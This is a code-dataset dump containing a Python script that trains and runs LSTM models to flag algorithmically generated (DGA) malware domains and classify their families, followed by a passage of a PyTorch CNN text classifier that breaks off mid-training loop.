+{"seq_id": "245138893", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Libraries\nimport os\nimport argparse\nimport sys\nimport time\nimport json\nimport re\nimport numpy as np\nimport pandas as pd\nimport statistics as stat\nimport lstm_binary\nimport lstm_multiclass\nfrom pprint import pprint\nfrom datetime import datetime\nfrom shutil import copy2\nfrom sklearn.model_selection import train_test_split\nimport pickle\n\n# constants\nmodels_path = '../data/local/models/'\ndata_path = '../data/local/staging/'\n\nREFPATH = \"./\"\nPROJECT_ROOT = \"/Users/nscsekhar/Desktop/nscsekhar/Desktop/Surya/Personal/MIDS/W210/Project/team_cyber/\"\nMULTI_TOKENIZER_FILE = PROJECT_ROOT + \"saved_models/multiclass_tokenizer.pkl\"\nMULTI_CATEGORIES_FILE = PROJECT_ROOT + \"saved_models/multiclass_categories.pkl\"\nMULTI_MODEL_JSON = PROJECT_ROOT + \"saved_models/multiclass_LSTM.json\"\nMULTI_MODEL_H5 = PROJECT_ROOT + \"saved_models/multiclass_LSTM.h5\"\n\n\ndef valid_filename(filename, path=''):\n '''valid_filename: determines if the given filename is a real file. Assumes that the file is in the current working directory for the program.\n\n returns: given file name\n '''\n if path == '':\n path = os.getcwd()+'/'\n\n if not os.path.isfile(path+filename):\n msg = \"The given file '{}' does not exist at '{}'.\".format(\n filename,\n path\n )\n raise argparse.ArgumentTypeError(msg)\n\n return filename\n\n\ndef parse_args():\n '''parse_args: parse command line arguments\n\n return: dictionary of arguments\n '''\n parser = argparse.ArgumentParser(\n description='Runs models either in train or inference mode.',\n prog='models',\n epilog='Models requires at least one of -t/--train or -i/--inference to operate correctly. Both may be provided for sequential analysis.')\n parser.add_argument('config_file',\n type=valid_filename,\n metavar='CONFIG_FILE',\n help=\"File path to the requex configuration file. File must be in JSON format.\")\n parser.add_argument('-t', '--train',\n metavar='TRAINING_FILE',\n nargs=1,\n help=\"Runs models in training mode. Training will be run on the given file. The training file must be a prepared '.csv' file. The program will search for the file in the models, then staging, and finally downloads directories.\")\n parser.add_argument('-i', '--inference',\n metavar='INFERENCE_FILE',\n nargs=1,\n help=\"Runs models in inference mode. Inference will be run on the given file. The inference file must be a list of domains separated by carriage returns with no header. The program will search for the file in the models, then staging, and finally downloads directories.\")\n parser.add_argument('-m', '--model', choices=['binary', 'multiclass'],\n metavar='model_type',\n required=True,\n help=\"This required option indicates which type of model is being built or used. Using 'binary' selects a benign/malicious model. Using 'multiclass' will classify the malware family for each malicious classified entry.\")\n\n return vars(parser.parse_args())\n\n\ndef get_config_filename(filename=None):\n '''get_config_filename: returns a verified Requex configuration file name. This function handles the ambiguity around whether the module was called from a shell with command line arguments or if called from another program using the run() function. If filename is none, the function assumes that there are\n\n return: string; valid filename.\n '''\n if filename is None:\n # get command line arguments\n args = parse_args()\n filename = args['config_file']\n else:\n # filename provided, verify the file exists\n if not os.path.isfile(filename):\n print(\"The given file '{}' does not exist at '{}'.\".format(\n filename,\n os.getcwd()\n ))\n exit(1)\n return filename\n\n\ndef get_config(filename):\n '''get_config: reads the configuration JSON file and stores values in a dictionary for processing.\n\n PRE: assumes the file already exists\n\n return: dict of configuration settings\n '''\n\n with open(filename, \"r\") as f:\n config = json.load(f)\n\n return config\n\n\ndef get_file_date(filename):\n '''get_file_date: extracts file date from file name. File date must be in YYYY-MM-DD format.\n\n returns: datetime object of file date.\n '''\n date = re.search(r'\\d\\d\\d\\d-\\d\\d-\\d\\d|$', filename).group()\n year, month, day = date.split('-')\n return datetime(int(year), int(month), int(day))\n\n\ndef write_to_train_logfile(metrics, logpath, stdout=True):\n '''write_to_train_logfile: writes metadata in the metrics dict to a logfile\n '''\n # constants\n logfile = 'requex_training_log.csv'\n\n # write to logfile\n stamp = datetime.utcnow().strftime('%Y-%m-%d-%H:%M')\n\n # extract the filename\n # filename = os.path.basename(datafile)\n\n if stdout:\n # print(\"info:{:>10} rows: {:>10} malicious, {:>10} benign, a {:>3.3f} ratio\".format(total_rows, malicious_rows, benign_rows, ratio))\n print('info: {}, {}, {}, {:>3.3f}s, {:>3.2f} MB, {} rows: {} malicious, {} benign, {:>3.3f} ratio, {}, {} categories, train rows: {}, test rows: {}, train time: {:>3.3f}s, inference time: {:>3.3f}s'.format(\n stamp, metrics['filename'], metrics['filedate'], metrics['time'], metrics['memory'], metrics['total_rows'], metrics['malicious_rows'], metrics['benign_rows'], metrics['ratio'], metrics['model'], metrics['categories'], metrics['train_rows'], metrics['test_rows'], metrics['train_time'], metrics['inference_time']))\n\n with open(logpath+logfile, 'at') as log:\n log.write('{}, {}, {}, {:>3.3f}, {:>3.2f}, {}, {}, {}, {:>3.3f}, {}, {}, {}, {}, {:>3.3f}, {:>3.3f}\\n'.format(\n stamp, metrics['filename'], metrics['filedate'], metrics['time'], metrics['memory'], metrics['total_rows'], metrics['malicious_rows'], metrics['benign_rows'], metrics['ratio'], metrics['model'], metrics['categories'], metrics['train_rows'], metrics['test_rows'], metrics['train_time'], metrics['inference_time']))\n\n\ndef copy_models(src, dst):\n '''copy_models: copies the source file (src) to the dst directory. src must be a file and dst must be a directory. Exclusions is an optional parameter that allows for files with certain file names to be excluded from being moved.\n '''\n # check to see if a directory for the dst directory exists\n if not os.path.isdir(dst):\n # directory does not exist, create it\n os.mkdir(dst)\n\n # verify whether the source and destination are the same\n src_path, filename = os.path.split(src)\n if os.path.isfile(dst+filename):\n print(\"A file by the name '{}' already exists. File not copied. Processing will continue using the file already in the '{}' directory.\".format(filename, dst))\n elif os.path.isfile(src):\n copy2(src, dst)\n else:\n print(\"The given file '{}' does not exist.\".format(src))\n exit(1)\n\n\ndef get_training_data(filename, metrics, logpath):\n '''get_training_data: reads the csv file into a pandas dataframe\n\n return: pandas dataframe\n '''\n # constants\n MB = 1024*1024\n\n start_time = time.time()\n df = pd.read_csv(filename,\n sep=',',\n parse_dates=[0],\n dtype={1: int, 2: str, 3: str},\n engine='c')\n end_time = time.time()\n read_time = end_time - start_time\n\n # calculate the memory footprint of the dataframe\n memory = sys.getsizeof(df)/MB\n\n filedate = get_file_date(filename)\n total = df.shape[0]\n benign = df.loc[df['dga'] == 0].shape[0]\n malicious = df.loc[df['dga'] == 1].shape[0]\n ratio = malicious / benign\n\n # write to logfile\n # write_to_train_logfile(logpath, filename, filedate.strftime('%Y-%m-%d'), read_time, memory, total, malicious, '2',benign, ratio)\n metrics = {\n 'filename': filename,\n 'filedate': filedate.strftime('%Y-%m-%d'),\n 'time': read_time,\n 'memory': memory,\n 'total_rows': total,\n 'malicious_rows': malicious,\n 'benign_rows': benign,\n 'ratio': ratio,\n 'categories': 0,\n 'model': 'unknown',\n 'train_rows': 0,\n 'test_rows': 0,\n 'train_time': 0,\n 'inference_rows': 0,\n 'inference_time': 0,\n 'inference_time_mean': 0.0\n }\n\n return df, metrics\n\n\ndef prep_training_dataset_binary(df):\n '''prep_training_dataset_binary: creates X, Y datasets for training and testing.\n\n returns: pandas dataframe x4: X_train, X_test, Y_train, Y_test\n '''\n # create X, Y dataframes. X = 'domain' and the model will try to\n # predict Y the catengory index.\n X = df['domain']\n Y = df['dga']\n\n X_train, X_test, Y_train, Y_test = train_test_split(\n X, Y, test_size=0.2, random_state=23)\n\n return X_train, X_test, Y_train, Y_test\n\n\ndef prep_training_dataset_multiclass(df, categories_file):\n '''prep_training_dataset_multiclass: creates X, Y datasets for training and testing.\n\n returns: pandas dataframe x4: X_train, X_test, Y_train, Y_test and the number of uniques\n '''\n\n # factorize the malware column\n df['catIndex'], uniques = pd.factorize(df['malware'], sort=True)\n\n # display factorized values\n # print('malware uniques: total - {}\\n{}'.format(len(uniques), uniques))\n # print('catIndex uniques: {}'.format(\n # pd.unique(df['catIndex'].sort_values())))\n\n # record the categories to disk\n with open(categories_file, 'wb') as f:\n pickle.dump(uniques, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n # create X, Y dataframes. X = 'domain' and the model will try to\n # predict Y the catengory index.\n X = df['domain']\n Y = df['catIndex']\n\n X_train, X_test, Y_train, Y_test = train_test_split(\n X, Y, test_size=0.2, random_state=23)\n\n return X_train, X_test, Y_train, Y_test, len(uniques)\n\n\ndef get_model_info(model_type, config):\n '''get_model_info: returns a dictionary with key value pairs of model file keys and model file names. The model file names are full path names anchored to the root_dir and placed in the models directory.\n\n type: a string indicating the type of model ['binary', ['multiclass']\n config: a dict filled with configuration parameters\n\n return: dict of model:filename pairs\n '''\n\n if model_type == 'binary':\n model = config['binary_model']\n elif model_type == 'multiclass':\n model = config['multiclass_model']\n else:\n # this branch shouldn't happen with the way parse_args() written\n msg = \"error: unsupported model type '{}'.\".format(model_type)\n raise argparse.ArgumentTypeError(msg)\n exit(1)\n\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n model = {\n 'model_json': root_dir+models_dir+model['model_json'],\n 'model_H5': root_dir+models_dir+model['model_H5'],\n 'model_tokenizer': root_dir+models_dir+model['model_tokenizer'],\n 'model_categories': root_dir+models_dir+model['model_categories'],\n 'model_algorithm': model['model_algorithm']\n }\n\n return model\n\n\ndef find_file(filename, config):\n '''find_file: looks for the file in a few directories and moves it into the models_dir. Returns the full path to the training file.\n\n return: string of full file path in the models_dir or an empty string\n '''\n root_dir = config['root_dir']\n downloads_dir = config['downloads_dir']\n staging_dir = config['staging_dir']\n models_dir = config['models_dir']\n\n # look for file in models_dir\n # look for file in staging_dir\n # look for file in downloads_dir\n if os.path.isfile(root_dir+models_dir+filename):\n return root_dir+models_dir\n elif os.path.isfile(root_dir+staging_dir+filename):\n return root_dir+staging_dir\n elif os.path.isfile(root_dir+downloads_dir+filename):\n return root_dir+downloads_dir\n else:\n return ''\n # msg = \"The given file '{}' does not exist at any of these locations '{}', '{}', '{}'.\".format(\n # filename,\n # models_dir,\n # staging_dir,\n # downloads_dir\n # )\n # print(msg)\n # exit(1)\n\n\ndef get_model_type(model_type):\n '''get_model_type: evaluates model_type to see if it is a valid option. If model_type is empty, function will attempt to pull the parameters from the command line. This function should mirror the choices in parse_args() for -m/--models.\n\n return: a string with the model_type; empty string if not correct.\n '''\n if model_type is '':\n args = parse_args()\n return args['model']\n elif model_type.lower() == 'binary':\n return 'binary'\n elif model_type.lower() == 'multiclass':\n return 'multiclass'\n else:\n return ''\n\n\ndef get_train_file(filename, config):\n '''get_train_file: evaluates the filename as well as command line arguments to get the training file name. Verifies that the training file exists.\n\n returns: string of a filename or empty string if not valid.\n '''\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n if filename == '':\n # no filename provided, attempt to get it from the command line\n # parameters\n args = parse_args()\n train_file = args['train']\n if train_file is not None:\n # extract the filename from the parameter list\n train_file = train_file[0]\n location = find_file(train_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+train_file, root_dir+models_dir)\n return root_dir+models_dir+train_file\n else:\n # the command line parameter for train_file was also None\n return ''\n else:\n # filename was provided\n location = find_file(train_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+train_file, root_dir+models_dir)\n return root_dir+models_dir+train_file\n\n\ndef get_inference_file(filename, config):\n '''get_inference_file: evaluates the filename as well as command line arguments to get the inference file name. Verifies that the inference file exists.\n\n returns: string of a filename or empty string if not valid.\n '''\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n if filename == '':\n # no filename provided, attempt to get it from the command line\n # parameters\n args = parse_args()\n inference_file = args['inference']\n if inference_file is not None:\n # extract the filename from the parameter list\n inference_file = inference_file[0]\n location = find_file(inference_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+inference_file, root_dir+models_dir)\n return root_dir+models_dir+inference_file\n else:\n # the command line parameter for inference_file was also None\n return ''\n else:\n # filename was provided\n location = find_file(inference_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+inference_file, root_dir+models_dir)\n return root_dir+models_dir+inference_file\n\n\ndef load_inference_data(filename):\n '''load_inference_data: reads data from the given filename. The file must be a text file with '\\n' at the end of each entry, one entry per line.\n\n returns: list of data to be analyzed\n '''\n domains = []\n with open(filename, 'rt', newline='\\n') as f:\n lines = f.readlines()\n\n for line in lines:\n domains.append(line.strip())\n\n return domains\n\n\ndef write_predictions(domains, predictions, model_type, model_algo, version, config):\n '''write_predictions: takes a 1-D list of domains and predictions and writes them to the inference file output. File name will be 'predictions_YYYY-MM-DD.txt'.\n '''\n\n # create filename\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n # get the current date and time:\n datestamp = time.strftime('%Y-%m-%d', time.gmtime())\n timestamp = time.strftime('%H:%M.%S', time.gmtime())\n\n output_file = root_dir+models_dir+model_type+model_algo+'_predictions_'+datestamp+'_v'+version+'.csv'\n\n # write the predictions to disk\n with open(output_file, 'wt') as f:\n f.write('creation_date: {} {}\\n'.format(datestamp, timestamp))\n for i, p in enumerate(predictions):\n # print('i: {}, p: {}, domains: {}'.format(i, p, domains[i]))\n f.write('{}, {}\\n'.format(domains[i], p))\n\n\ndef get_version_number(filename):\n '''get_version_number: extracts the version number from the filename.\n\n returns: string with a version number in it.\n '''\n basename = os.path.basename(filename)\n reg = re.compile(r'(?:_v\\d+)|$', flags=re.IGNORECASE)\n return re.search(reg, basename).group()[2:]\n\n\ndef run(config_file=None, model_type='', train_file='', inference_file=''):\n # get configuration parameters\n config_file = get_config_filename(config_file)\n config = get_config(config_file)\n # print('configuration settings:')\n # pprint(config)\n\n # parse function/command line parameters\n model_type = get_model_type(model_type)\n train_file = get_train_file(train_file, config)\n inference_file = get_inference_file(inference_file, config)\n\n # assemble the path to the log directory\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n logpath = root_dir+models_dir\n\n if model_type == '':\n print(\"error: an invalid model type was given. See the -h/--help command line options for valid model choices.\")\n exit(1)\n\n if train_file == '' and inference_file == '':\n print(\"error: neither train or inference were given as arguments. Please run again, but with either -t/--train or -i/--inference options (or both) enabled.\")\n exit(1)\n\n # get the model information from the configuration file\n model_info = get_model_info(model_type, config)\n metrics = {\n 'filename': '',\n 'filedate': '',\n 'time': 0.0,\n 'memory': 0.0,\n 'total_rows': 0,\n 'malicious_rows': 0,\n 'benign_rows': 0,\n 'ratio': 0.0,\n 'categories': 0,\n 'model': 'unknown',\n 'train_rows': 0,\n 'test_rows': 0,\n 'train_time': 0,\n 'inference_rows': 0,\n 'inference_time': 0,\n 'inference_time_mean': 0.0\n }\n\n if train_file != '':\n # a training file was provided\n model_version = get_version_number(train_file)\n\n # get training data from disk\n df, metrics = get_training_data(train_file, metrics, logpath)\n\n if model_type == 'binary':\n X_train, X_test, Y_train, Y_test = prep_training_dataset_binary(df)\n metrics['model'] = model_type\n metrics['categories'] = 2\n metrics['train_rows'] = X_train.shape[0]\n metrics['test_rows'] = X_test.shape[0]\n # pprint(metrics)\n print('info: {} – training started.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())))\n train_model = lstm_binary.LSTMBinary()\n start_time = time.time()\n train_model.train(X_train, Y_train)\n end_time = time.time()\n train_time = end_time - start_time\n metrics['train_time'] = train_time\n print('info: {} – training ended. Train time {:>3.3f}s.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime()), train_time))\n write_to_train_logfile(metrics, logpath, True)\n\n train_model.save(model_info['model_tokenizer'],\n model_info['model_json'],\n model_info['model_H5'])\n\n elif model_type == 'multiclass':\n # create X and Y and split into train and test\n X_train, X_test, Y_train, Y_test, categories = prep_training_dataset_multiclass(\n df, model_info['model_categories'])\n metrics['model'] = model_type\n metrics['categories'] = categories\n metrics['train_rows'] = X_train.shape[0]\n metrics['test_rows'] = X_test.shape[0]\n\n print('info: {} – training started.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())))\n start_time = time.time()\n train_model = lstm_multiclass.LSTMMulti()\n train_model.train(X_train, Y_train)\n end_time = time.time()\n train_time = end_time - start_time\n metrics['train_time'] = train_time\n print('info: {} – training ended. Train time {:>3.3f}s.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime()), train_time))\n write_to_train_logfile(metrics, logpath, True)\n\n train_model.save(model_info['model_tokenizer'],\n model_info['model_categories'],\n model_info['model_json'],\n model_info['model_H5'])\n else:\n print(\"error: unrecognized model type.\")\n exit(1)\n # train the model (which model is set by models input)\n # train_model.train(X_train, Y_train)\n # train_model.save(TOKENIZER_FILE, MODEL_JSON, MODEL_H5)\n # save the model to disk\n\n if inference_file != '':\n # an inference file was provided\n model_version = get_version_number(inference_file)\n print('inference file: {}'.format(inference_file))\n if model_type == 'binary':\n metrics['filename'] = inference_file\n metrics['filedate'] = time.strftime('%Y-%m-%d', time.gmtime())\n\n predict_model = lstm_binary.LSTMBinary()\n predict_model.load(model_info['model_tokenizer'],\n model_info['model_json'],\n model_info['model_H5'])\n domains = load_inference_data(inference_file)\n # print(\"Number of domains: \", len(domains))\n # print(\"Top 10:\\n\", domains[:10])\n\n # run predictions, record timings\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference started.'.format(timestamp))\n start_time = time.time()\n predictions = predict_model.predict(domains)\n end_time = time.time()\n prediction_time = end_time - start_time\n domain_count = len(domains)\n metrics['inference_rows'] = domain_count\n metrics['inference_time'] = prediction_time\n metrics['inference_time_mean'] = prediction_time / domain_count\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference ended. Inference time {:>3.3f}s.'.format(timestamp, prediction_time))\n\n # reshape the predictions\n predictions = np.reshape(predictions, [predictions.shape[0], ]).tolist()\n # print(predictions[:10])\n # print(\"domains: {}, predictions: {}\".format(len(domains), len(predictions)))\n\n # write the predictions to file\n write_predictions(domains, predictions, model_type, model_info['model_algorithm'], model_version, config)\n\n # write_to_train_logfile(metrics, logpath, True)\n elif model_type == 'multiclass':\n metrics['filename'] = inference_file\n metrics['filedate'] = time.strftime('%Y-%m-%d', time.gmtime())\n\n predict_model = lstm_multiclass.LSTMMulti()\n predict_model.load(model_info['model_tokenizer'],\n model_info['model_categories'],\n model_info['model_json'],\n model_info['model_H5'])\n domains = load_inference_data(inference_file)\n # print(\"Number of domains: \", len(domains))\n # print(\"Top 10:\\n\", domains[:10])\n\n # run predictions, record timings\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference started.'.format(timestamp))\n start_time = time.time()\n predictions, pred_prob = predict_model.predict(domains)\n end_time = time.time()\n prediction_time = end_time - start_time\n domain_count = len(domains)\n metrics['inference_rows'] = domain_count\n metrics['inference_time'] = prediction_time\n metrics['inference_time_mean'] = prediction_time / domain_count\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference ended. Inference time {:>3.3f}s.'.format(timestamp, prediction_time))\n\n # reshape the predictions\n # predictions = np.reshape(predictions, [predictions.shape[0], ]).tolist()\n # print(predictions[:10])\n # print(\"domains: {}, predictions: {}\".format(len(domains), len(predictions)))\n\n # write the predictions to file\n write_predictions(domains, predictions, model_type, model_info['model_algorithm'], model_version, config)\n else:\n print(\"error: unrecognized model type.\")\n exit(1)\n # get test data\n # load the model (based on models input)\n # testmodel = lstm_binary.LSTMBinary()\n # testmodel.load(BINARY_TOKENIZER_FILE, BINARY_MODEL_JSON, BINARY_MODEL_H5)\n # make predictions\n # urllist = [\"www.google.com\", \"www.netflix.com\", \"plvklpgwivery.com\"]\n # urltypes = testmodel.predict(urllist)\n # print(\"URL type:\", urltypes)\n\n\nif __name__ == '__main__':\n run()\n", "sub_path": "code/models/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 26220, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.getcwd", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 47, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 95, "usage_type": "call"}, {"api_name": "json.load", "line_number": 110, "usage_type": "call"}, {"api_name": "re.search", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 132, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 132, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 160, "usage_type": "call"}, {"api_name": "time.time", "line_number": 174, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 175, "usage_type": "call"}, {"api_name": "time.time", "line_number": 180, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 184, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 226, "usage_type": "call"}, {"api_name": "pandas.factorize", "line_number": 239, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 248, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 248, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 255, "usage_type": "call"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 309, "usage_type": "call"}, {"api_name": "os.path", "line_number": 309, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 311, "usage_type": "call"}, {"api_name": "os.path", "line_number": 311, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 439, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 439, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 440, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 440, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 458, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 458, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 459, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 522, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 522, "usage_type": "call"}, {"api_name": "lstm_binary.LSTMBinary", "line_number": 523, "usage_type": "call"}, {"api_name": "time.time", "line_number": 524, "usage_type": "call"}, {"api_name": "time.time", "line_number": 526, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 529, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 529, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 545, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 545, "usage_type": "call"}, {"api_name": "time.time", "line_number": 546, "usage_type": "call"}, {"api_name": "lstm_multiclass.LSTMMulti", "line_number": 547, "usage_type": "call"}, {"api_name": "time.time", "line_number": 549, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 552, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 552, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 573, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 573, "usage_type": "call"}, {"api_name": "lstm_binary.LSTMBinary", "line_number": 575, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 584, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 584, "usage_type": "call"}, {"api_name": "time.time", "line_number": 586, "usage_type": "call"}, {"api_name": "time.time", "line_number": 588, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 594, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 594, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 598, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 608, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 608, "usage_type": "call"}, {"api_name": "lstm_multiclass.LSTMMulti", "line_number": 610, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 620, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 620, "usage_type": "call"}, {"api_name": "time.time", "line_number": 622, "usage_type": "call"}, {"api_name": "time.time", "line_number": 624, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 630, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 630, "usage_type": "call"}]}
+{"seq_id": "577887414", "text": "import torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\ntorch.manual_seed(1)\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import f1_score\nimport copy\n\n##########################################################\n\nlabel_to_ix=np.load('label_to_ix.npy').item()\nix_to_label=np.load('ix_to_label.npy')\ntraining_data=np.load('training_data.npy')\ntest_data=np.load('test_data.npy')\nval_data=np.load('val_data.npy')\nword_to_ix=np.load('word_to_ix.npy').item()\nix_to_word=np.load('ix_to_word.npy')\nnewwikivec=np.load('newwikivec.npy')\nwikivoc=np.load('wikivoc.npy').item()\n\n\n\nwikisize=newwikivec.shape[0]\nrvocsize=newwikivec.shape[1]\nwikivec=autograd.Variable(torch.FloatTensor(newwikivec))\n\nbatchsize=32\n\n\n\ndef preprocessing(data):\n\n new_data=[]\n for i, note, j in data:\n templabel=[0.0]*len(label_to_ix)\n for jj in j:\n if jj in wikivoc:\n templabel[label_to_ix[jj]]=1.0\n templabel=np.array(templabel,dtype=float)\n new_data.append((i, note, templabel))\n new_data=np.array(new_data)\n \n lenlist=[]\n for i in new_data:\n lenlist.append(len(i[0]))\n sortlen=sorted(range(len(lenlist)), key=lambda k: lenlist[k]) \n new_data=new_data[sortlen]\n \n batch_data=[]\n \n for start_ix in range(0, len(new_data)-batchsize+1, batchsize):\n thisblock=new_data[start_ix:start_ix+batchsize]\n mybsize= len(thisblock)\n numword=np.max([len(ii[0]) for ii in thisblock])\n main_matrix = np.zeros((mybsize, numword), dtype= np.int)\n for i in range(main_matrix.shape[0]):\n for j in range(main_matrix.shape[1]):\n try:\n if thisblock[i][0][j] in word_to_ix:\n main_matrix[i,j] = word_to_ix[thisblock[i][0][j]]\n \n except IndexError:\n pass # because initialze with 0, so you pad with 0\n \n xxx2=[]\n yyy=[]\n for ii in thisblock:\n xxx2.append(ii[1])\n yyy.append(ii[2])\n \n xxx2=np.array(xxx2)\n yyy=np.array(yyy)\n batch_data.append((autograd.Variable(torch.from_numpy(main_matrix)),autograd.Variable(torch.FloatTensor(xxx2)),autograd.Variable(torch.FloatTensor(yyy))))\n return batch_data\nbatchtraining_data=preprocessing(training_data)\nbatchtest_data=preprocessing(test_data)\nbatchval_data=preprocessing(val_data)\n\n\n\n\n######################################################################\n# Create the model:\n\nEmbeddingsize=100\nhidden_dim=200\nclass CNN(nn.Module):\n\n def __init__(self, batch_size, vocab_size, tagset_size):\n super(CNN, self).__init__()\n self.hidden_dim = hidden_dim\n self.word_embeddings = nn.Embedding(vocab_size+1, Embeddingsize, padding_idx=0)\n self.embed_drop = nn.Dropout(p=0.2)\n \n self.hidden2tag = nn.Linear(300, tagset_size)\n \n \n self.convs1 = nn.Conv1d(Embeddingsize,100,3)\n self.convs2 = nn.Conv1d(Embeddingsize,100,4)\n self.convs3 = nn.Conv1d(Embeddingsize,100,5)\n \n \n self.layer2 = nn.Linear(Embeddingsize, 1,bias=False)\n self.embedding=nn.Linear(rvocsize,Embeddingsize)\n self.vattention=nn.Linear(Embeddingsize,Embeddingsize)\n \n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n self.dropout = nn.Dropout(0.2)\n \n def forward(self, vec1, nvec, wiki, simlearning):\n \n thisembeddings=self.word_embeddings(vec1)\n thisembeddings = self.embed_drop(thisembeddings)\n thisembeddings=thisembeddings.transpose(1,2)\n \n output1=self.tanh(self.convs1(thisembeddings))\n output1=nn.MaxPool1d(output1.size()[2])(output1)\n \n output2=self.tanh(self.convs2(thisembeddings))\n output2=nn.MaxPool1d(output2.size()[2])(output2)\n \n output3=self.tanh(self.convs3(thisembeddings))\n output3=nn.MaxPool1d(output3.size()[2])(output3)\n \n output4 = torch.cat([output1,output2,output3], 1).squeeze(2)\n \n if simlearning==1:\n nvec=nvec.view(batchsize,1,-1)\n nvec=nvec.expand(batchsize,wiki.size()[0],-1)\n wiki=wiki.view(1,wiki.size()[0],-1)\n wiki=wiki.expand(nvec.size()[0],wiki.size()[1],-1)\n new=wiki*nvec\n new=self.embedding(new)\n vattention=self.sigmoid(self.vattention(new))\n new=new*vattention\n vec3=self.layer2(new)\n vec3=vec3.view(batchsize,-1)\n \n \n vec2 = self.hidden2tag(output4)\n if simlearning==1:\n tag_scores = self.sigmoid(vec2.detach()+vec3)\n else:\n tag_scores = self.sigmoid(vec2)\n \n \n return tag_scores\n\n######################################################################\n# Train the model:\n\ntopk=10\n\ndef trainmodel(model, sim):\n print ('start_training')\n modelsaved=[]\n modelperform=[]\n topk=10\n \n \n bestresults=-1\n bestiter=-1\n for epoch in range(5000): \n model.train()\n \n lossestrain = []\n recall=[]\n for 